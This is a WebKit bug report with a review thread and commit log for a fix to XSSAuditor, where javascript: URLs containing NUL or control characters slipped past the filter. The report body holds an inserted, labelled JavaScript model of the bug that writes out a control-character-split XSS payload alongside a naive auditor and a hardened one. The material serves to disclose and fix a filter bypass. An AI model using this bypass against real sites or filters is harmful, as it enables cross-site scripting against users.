Bug 27151

Summary: [XSSAuditor] JavaScript URLs with null/control characters bypass XSSAuditor
Product: WebKit
Reporter: Daniel Bates <dbates>
Component: WebCore Misc.
Assignee: Nobody <webkit-unassigned>
Status: RESOLVED FIXED
Severity: Normal
CC: abarth, dbates, sam
Priority: P2
Version: 528+ (Nightly build)
Hardware: All
OS: All
Attachments:
Patch with tests (10.74 KB, patch), 2009-07-10 11:20 PDT, Daniel Bates; abarth: review-
Updated patch with tests. (11.84 KB, patch), 2009-07-10 13:35 PDT, Daniel Bates; abarth: review+

Daniel Bates
Reported 2009-07-10 11:16:17 PDT
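An added example, not part of this bug report or of the WebKit patch, that models the bug class named in the summary: a reflected-XSS filter that refuses to run a javascript: URL whose body appears in the request, but compares that body after the URL parser has dropped NUL/control characters against a request that still contains them. The browser-side helpers (stripControlChars, javaScriptURLBody), the echo.pl request, the payload and both auditor functions are assumptions constructed for the illustration; WebKit's actual logic lives in WebCore/page/XSSAuditor.cpp and is not reproduced here.

```javascript
// Added illustration for bug 27151: a reflected-XSS filter defeated by a
// normalization mismatch. Not WebKit code; every helper here is a constructed
// model (see the lead-in above).

// Assumption: the browser's URL parser drops ASCII control characters (NUL,
// tab, newline, ..., DEL) from a URL before the scheme is recognised and the
// javascript: body is handed to the script engine.
function stripControlChars(s) {
  return s.replace(/[\x00-\x1F\x7F]/g, "");
}

// Script body the browser would evaluate for an href, or null when the href is
// not a javascript: URL once control characters are removed.
function javaScriptURLBody(href) {
  const cleaned = stripControlChars(href);
  if (!/^javascript:/i.test(cleaned)) return null;
  return decodeURIComponent(cleaned.slice("javascript:".length));
}

// "Before" auditor (hypothetical): allow the script unless its body appears
// verbatim in the percent-decoded request. The decoded request still holds the
// control character the URL parser removed from the href, so the search fails.
function naiveAuditorAllows(requestURL, scriptBody) {
  const decodedRequest = decodeURIComponent(requestURL);
  return !decodedRequest.includes(scriptBody);
}

// Hardened auditor: canonicalize the request exactly as the href was
// canonicalized (strip the same control characters) before searching.
function hardenedAuditorAllows(requestURL, scriptBody) {
  const decodedRequest = stripControlChars(decodeURIComponent(requestURL));
  return !decodedRequest.includes(scriptBody);
}

// Constructed attack: a query parameter that a hypothetical echo.pl reflects
// unescaped into the page. The control character splits the token "alert", so
// the request never contains the evaluated body verbatim.
function buildCase(controlChar) {
  const payloadHref =
    "javascript:ale" + controlChar + "rt(String.fromCharCode(88,83,83))";
  const requestURL =
    "http://localhost:8000/echo.pl?q=" +
    encodeURIComponent("<a href='" + payloadHref + "'>Click</a>");
  const scriptBody = javaScriptURLBody(payloadHref);
  return {
    scriptBody,
    naiveAllows: naiveAuditorAllows(requestURL, scriptBody),
    hardenedAllows: hardenedAuditorAllows(requestURL, scriptBody),
  };
}

// Page-authored link that does not come from the request: both auditors must
// keep allowing it, otherwise the fix would break ordinary pages.
function benignCase() {
  const requestURL =
    "http://localhost:8000/echo.pl?q=" + encodeURIComponent("hello");
  const scriptBody = javaScriptURLBody("javascript:void(0)");
  return {
    naiveAllows: naiveAuditorAllows(requestURL, scriptBody),
    hardenedAllows: hardenedAuditorAllows(requestURL, scriptBody),
  };
}

for (const [name, ch] of [["NUL", "\x00"], ["TAB", "\t"], ["none", ""]]) {
  const r = buildCase(ch);
  console.log(name, "naive allows:", r.naiveAllows,
              "hardened allows:", r.hardenedAllows);
}
```

The point of the hardened variant is not the specific character list but that both sides of the comparison go through the same canonicalization; any transformation the URL parser applies before execution (here, dropping control characters) must be applied to the request text before the substring search, or the attacker picks the one input that the parser silently repairs.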
Daniel Bates
Comment 1 2009-07-10 11:20:23 PDT
Created attachment 32565
Patch with tests
Adam Barth
Comment 2 2009-07-10 13:16:57 PDT
Comment on attachment 32565
Patch with tests

This looks good, but can you make the same change to the V8 bindings in WebCore/bindings/v8?
Daniel Bates
Comment 3 2009-07-10 13:35:23 PDT
Created attachment 32573
Updated patch with tests.

I made the changes in the V8 bindings, but how do I test it? Also, I moved the line "const String* savedSourceURL = m_sourceURL;" back to its original place in the file WebCore/bindings/js/ScriptController.cpp.
Adam Barth
Comment 4 2009-07-10 13:39:27 PDT
Comment on attachment 32573
Updated patch with tests.

This looks good. To test the V8 bindings, you need a Chromium build. I'll watch the Chromium build bot to make sure it works fine.
Daniel Bates
Comment 5 2009-07-10 13:41:16 PDT
Thanks.

(In reply to comment #4)
> (From update of attachment 32573)
> This looks good. To test the V8 bindings, you need a Chromium build. I'll
> watch the chromium build bot to make sure it works fine.
Adam Barth
Comment 6 2009-07-10 18:32:05 PDT
Sending        LayoutTests/ChangeLog
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-control-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char-expected.txt
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link-null-char.html
Adding         LayoutTests/http/tests/security/xssAuditor/javascript-link.html
Adding         LayoutTests/http/tests/security/xssAuditor/resources/echo-intertag-click-and-notify.pl
Sending        WebCore/ChangeLog
Sending        WebCore/bindings/js/ScriptController.cpp
Sending        WebCore/bindings/v8/ScriptController.cpp
Sending        WebCore/page/XSSAuditor.cpp
Sending        WebCore/page/XSSAuditor.h
Transmitting file data .............
Committed revision 45741.
http://trac.webkit.org/changeset/45741